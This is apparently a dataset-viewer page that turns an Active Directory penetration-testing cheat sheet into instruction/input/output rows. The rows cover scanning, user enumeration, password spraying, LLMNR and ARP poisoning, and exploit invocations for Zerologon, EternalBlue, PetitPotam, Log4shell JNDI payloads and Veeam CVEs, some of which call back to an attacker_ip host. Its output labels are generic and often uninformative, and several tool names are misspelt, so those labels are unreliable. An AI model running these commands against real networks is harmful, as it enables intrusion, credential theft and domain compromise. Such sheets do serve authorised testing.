instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Scan Network | nxc smb <ip_range> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Scan Network | nmap -sU -sC -sV -oA <output> <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Scan Network | nmap -Pn -sC -sV -p- -oA <output> <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Scan Network | nmap -Pn -sC -sV -oA <output> <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Scan Network | nmap -Pn --script smb-vuln* -p139,445 <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Scan Network | nmap -Pn -sV --top-ports 50 --open <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Scan Network | nmap -sP -p <ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Find DC IP | nmap -p 88 --open <ip_range> | Network/service scan or enumeration command (Nmap) with specified options. |
Find DC IP | nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain> | Tool or command referenced under 'Find DC IP'. |
Find DC IP | nmcli dev show <interface> | Note or procedural step under 'Find DC IP'. |
Zone Transfer | dig axfr <domain_name> @<name_server> | Tool or command referenced under 'Zone Transfer'. |
Anonymous & Guest access on SMB shares | smbclient -U '%' -L //<ip> | SMB client usage to list or access network shares. |
Anonymous & Guest access on SMB shares | enum4linux-ng.py -a -u '' -p '' <ip> | Note or procedural step under 'Anonymous & Guest access on SMB shares'. |
Anonymous & Guest access on SMB shares | nxc smb <ip_range> -u 'a' -p '' | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Anonymous & Guest access on SMB shares | nxc smb <ip_range> -u '' -p ' | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Enumerate LDAP: | ldapsearch -x -H <dc_ip> -s base | Tool or command referenced under 'Enumerate LDAP:'. |
Enumerate LDAP: | nmap -n -sV --script 'ldap*' and not brute -p 389 <dc_ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Enumerate Users: | nxc smb <dc_ip> --rid-brute 10000 # bruteforcing RID | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Enumerate Users: | nxc smb <dc_ip> --users | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Enumerate Users: | net rpc group members 'Domain Users' -W '<domain> -l <ip> -U '%' | Note or procedural step under 'Enumerate Users:'. |
Bruteforce users: | kerbrute userenum -d <domain> <userlist> | Tool or command referenced under 'Bruteforce users:'. |
Bruteforce users: | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<user_list_file>" <dc_ip> | Network/service scan or enumeration command (Nmap) with specified options. |
Poisoning: | LLMNR / NBTNS / MDNS | Note or procedural step under 'Poisoning:'. |
Poisoning: | responder -l <interface> | Tool or command referenced under 'Poisoning:'. |
Poisoning: | DHCPv6 (IPv6 prefered to IPv4) | Note or procedural step under 'Poisoning:'. |
Poisoning: | mitm6 -d <domain> | Tool or command referenced under 'Poisoning:'. |
Poisoning: | bettercap | Tool or command referenced under 'Poisoning:'. |
Poisoning: | ARP Poisoning | Note or procedural step under 'Poisoning:'. |
Poisoning: | bettercap | Tool or command referenced under 'Poisoning:'. |
Poisoning: | asreqroast | Note or procedural step under 'Poisoning:'. |
Poisoning: | Pcredz -i <interface> -v | Note or procedural step under 'Poisoning:'. |
Unauthenticated PetitPotam (CVE-2022-26925) | petitpotam.py -d <domain> <listener> <target> | Note or procedural step under 'Unauthenticated PetitPotam (CVE-2022-26925)'. |
no password | pxethief.py 1 | Note or procedural step under 'no password'. |
no password | pxethief.py 2 <distribution_point_ip> | Note or procedural step under 'no password'. |
password protected | tftp -i <dp_ip> GET "\xxx\boot.var" | Note or procedural step under 'password protected'. |
password protected | pxethief.py 5 '\xxx\boot.var' | Note or procedural step under 'password protected'. |
password protected > TimeRoasting | timeroast.py <dc_ip> -o <output_log> | Note or procedural step under 'password protected > TimeRoasting'. |
Quick Compromise: > Zerologon (unsafe) CVE-2020-1472 | zerologon-scan '<dc_netbios_name>' '<ip>' | Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'. |
Quick Compromise: > Zerologon (unsafe) CVE-2020-1472 | cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip> | Note or procedural step under 'Quick Compromise: > Zerologon (unsafe) CVE-2020-1472'. |
Eternal Blue MS17-010: | msf> exploit/windows/smb/ms17_010_eternalblue # SMBv1 only | Tool or command referenced under 'Eternal Blue MS17-010:'. |
Eternal Blue MS17-010: > Tomcat/Jboss Manager | msf> auxiliary/scanner/http/tomcat_enum | Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'. |
Eternal Blue MS17-010: > Tomcat/Jboss Manager | msf> exploit/multi/http/tomcat_mgr_deploy | Tool or command referenced under 'Eternal Blue MS17-010: > Tomcat/Jboss Manager'. |
Java RMI: | msf> use exploit/multi/misc/java_rmi_server | Tool or command referenced under 'Java RMI:'. |
Java Serialiszed port: | ysoserial.jar <gadget> '<cmd>' |nc <ip> <port> | Note or procedural step under 'Java Serialiszed port:'. |
Log4shell: | ${jndi:ldap://<ip>:<port>/o=reference} | Note or procedural step under 'Log4shell:'. |
Database: | msf> use auxiliary/admin/mssql/mssql_enum_sql_logins | Tool or command referenced under 'Database:'. |
Exchange: | Proxyshell | Note or procedural step under 'Exchange:'. |
Exchange: | proxyshell_rce.py -u https://<exchange> -e administrator@<domain> | Note or procedural step under 'Exchange:'. |
Veeam: | CVE-2023-27532 (creds Veeam backup) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | VeeamHax.exe --target <veeam_server> | Note or procedural step under 'Veeam:'. |
Veeam: | CVE-2023-27532 net.tcp:/<target>:<port>/ | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29849 (auth bypass - Veeam Backup Enterprise Manager) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29849.py --target https://<veeam_ip>:<veeam_port>/ --callback-server <attacker_ip>:<port> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29855 (auth bypass - Veeam Recovery Orchestrator) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-29855.py --start_time <start_time_epoch> --end_time <end_time_epoch> --username <user>@<domain> --target https://<veeam_ip>:<veeam_port>/ | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-40711 (unserialize - Veeam backup) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Veeam: | CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://<attacker_ip>:8000/trigger --targetveeam <veeam_ip> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
GLPI: | CVE-2022-35914 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
GLPI: | /vendor/htmlawed/htmlawed/htmLawedTest.php | Note or procedural step under 'GLPI:'. |
GLPI: | CVE_2023_41320 | Note or procedural step under 'GLPI:'. |
GLPI: | cve_2023_41320.py -u <user> -p <password> -t <ip> | Note or procedural step under 'GLPI:'. |
GLPI: > Weak websites / services | nuclei | Note or procedural step under 'GLPI: > Weak websites / services'. |
GLPI: > Weak websites / services | nuclei -target <ip_range> | Note or procedural step under 'GLPI: > Weak websites / services'. |
GLPI: > Weak websites / services | nessus | Note or procedural step under 'GLPI: > Weak websites / services'. |
Password Spray | Get password policy (you need creds,but you should get the policy first to avoid locking accounts) | Note or procedural step under 'Password Spray'. |
Password Spray | default policy | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u '<user>' -p '<password>' -pass-pol | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | Get-ADDefaultDomainPasswordPolicy | Note or procedural step under 'Password Spray'. |
Password Spray | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> domain_policy | Note or procedural step under 'Password Spray'. |
Password Spray | Fined Policy (Privileged) | Note or procedural step under 'Password Spray'. |
Password Spray | ldapsearch-ad.py --server <dc> -d <domain> -u <user> -p <pass> --type pass-pol | Tool or command referenced under 'Password Spray'. |
Password Spray | Get-ADFineGainedPasswordPolicy -filter * | Note or procedural step under 'Password Spray'. |
Password Spray | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> pso # can also be runned with a low priv account but less information will be available | Note or procedural step under 'Password Spray'. |
Password Spray | user == password | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u <users.txt> -p <passwords.txt> --no-bruteforce --continue-on-success | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | sprayhound -U <users.txt> -d <domain> -dc <dc_ip> # add --lower to lowercase and --upper to uppercase. Add nothing to get only user=pass | Note or procedural step under 'Password Spray'. |
Password Spray | usuals passwords (SeasonYear!, Company123, ...) | Note or procedural step under 'Password Spray'. |
Password Spray | nxc smb <dc_ip> -u <users.txt> -p <password> --continue-on-success | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Password Spray | sprayhound -U <users.txt> -p <password> -d <domain> -dc <dc_ip> | Note or procedural step under 'Password Spray'. |
Password Spray | kerbrute passwordspray -d <domain> <users.txt> <password> | Tool or command referenced under 'Password Spray'. |
ASREPRoast | List ASREPRoastable Users (need creds) | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | Bloodhound: MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ASREPRoast | ASREP roasting | Note or procedural step under 'ASREPRoast'. |
ASREPRoast | GetNPUsers.py <domain>/ -usersfile <users.txt> -format hashcat -outputfile <output.txt> | Tool or command referenced under 'ASREPRoast'. |
ASREPRoast | nxc ldap <dc_ip> -u <users.txt> -p '' --asreproast <output.txt> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ASREPRoast | Rubeus.exe asreproast /format:hashcat | Tool or command referenced under 'ASREPRoast'. |
ASREPRoast > Blind Kerberoasting | Rubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth: <asrep_user> /spns:<users.txt> | Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'. |
ASREPRoast > Blind Kerberoasting | GetUserSPNs.py -no-preauth "<asrep_user>" -usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<domain>"/ | Tool or command referenced under 'ASREPRoast > Blind Kerberoasting'. |
ASREPRoast > Blind Kerberoasting | CVE-2022-33679 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
ASREPRoast > Blind Kerberoasting | CVE-2022-33679.py <domain>/<user> <target> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Listen | Respinder -l <interface> #use --lm to force downgrade | Note or procedural step under 'Listen'. |
Listen | smbclient.py | SMB client usage to list or access network shares. |
NTLM relay | MS-08-068 self relay | Note or procedural step under 'NTLM relay'. |
NTLM relay | msf>exploit/windows/smb_smb_relay #windows 2000 / windows 2008 server | Tool or command referenced under 'NTLM relay'. |
NTLM relay | smb -> LDAP(S) | Note or procedural step under 'NTLM relay'. |
NTLM relay | NTLMv1 | Note or procedural step under 'NTLM relay'. |
NTLM relay | remove mic (no CVE needed) | Note or procedural step under 'NTLM relay'. |
NTLM relay | NTLMv2 | Note or procedural step under 'NTLM relay'. |
NTLM relay | remove mic (CVE-2019-10140) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.